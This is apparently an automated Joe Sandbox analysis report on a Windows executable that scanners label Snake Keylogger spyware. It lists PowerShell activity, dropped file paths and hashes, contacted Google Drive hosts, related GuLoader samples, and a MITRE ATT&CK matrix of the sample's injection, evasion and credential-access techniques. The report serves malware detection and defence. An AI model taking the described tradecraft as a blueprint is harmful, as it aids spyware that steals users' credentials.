Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\yMXFgPOdf2.exe

Code function: 0_2_00405DC3 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00405DC3

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	11 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	1 DLL Side-Loading	21 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	1 Clipboard Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	21 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
yMXFgPOdf2.exe	74%	ReversingLabs	Win32.Spyware.Snakekeylogger
yMXFgPOdf2.exe	67%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe	74%	ReversingLabs	Win32.Spyware.Snakekeylogger

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.181.238	true	false		high
drive.usercontent.google.com	142.250.185.225	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmp	false	high
https://translate.google.com/translate_a/element.js	msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/Hs	msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2793918329.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lBeq	powershell.exe, 00000002.00000002.2633960829.0000000005011000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/rLw	msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	yMXFgPOdf2.exe, yMXFgPOdf2.exe.2.dr	false	high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/us	msiexec.exe, 00000006.00000003.3754970977.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3766066767.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888591860.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877666858.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2793918329.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919726591.0000000000C54000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/~~	msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.google.com	msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/O	msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 00000006.00000003.3158371756.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522537698.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511525087.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3036972304.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/tw	msiexec.exe, 00000006.00000003.3279338042.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	false	high
https://drive.google.com/$h	msiexec.exe, 00000006.00000003.2905309263.0000000000C56000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2633960829.0000000005166000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2641322586.0000000006078000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/J~	msiexec.exe, 00000006.00000002.3919635196.0000000000BEA000.00000004.00000020.00020000.00000000.sdmp	false	high
https://apis.google.com	msiexec.exe, 00000006.00000003.3026290966.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2916029395.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3522457275.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919760505.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633417738.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3268706470.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2782075548.0000000000C5D000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3511421871.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400803010.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3633335722.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.2905343367.0000000000C98000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644521487.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3919635196.0000000000C2B000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3400844918.0000000000C53000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3877570372.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3765998726.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3644400467.0000000000CA8000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3888508382.0000000000CA2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147564358.0000000000C56000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3754828569.0000000000CA7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000003.3147600685.0000000000C44000.00000004.00000020.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2633960829.0000000005011000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.181.238	drive.google.com	United States		15169	GOOGLEUS	false
142.250.185.225	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588705
Start date and time:	2025-01-11 04:32:45 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	yMXFgPOdf2.exe renamed because original name is a hash value
Original Sample Name:	c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7.exe
Detection:	MAL
Classification:	mal96.troj.evad.winEXE@6/12@2/2
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 92% Number of executed functions: 70 Number of non-executed functions: 45
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	2976587-987347589.07.exe	Get hash	malicious	Unknown	Browse	142.250.181.238 142.250.185.225
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.181.238 142.250.185.225
	LMSxhK1u8Z.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.225
	ro7eoySJ9q.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.225
	ro7eoySJ9q.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.225
	4NG0guPiKA.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.238 142.250.185.225
	ZoRLXzC5qF.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	142.250.181.238 142.250.185.225
	YrCSUX2O3I.exe	Get hash	malicious	GuLoader	Browse	142.250.181.238 142.250.185.225
	4AMVusDMPP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.238 142.250.185.225

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3pqragka.h2t.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Reputation:	high, very likely benign file
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5pfx414q.pqv.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

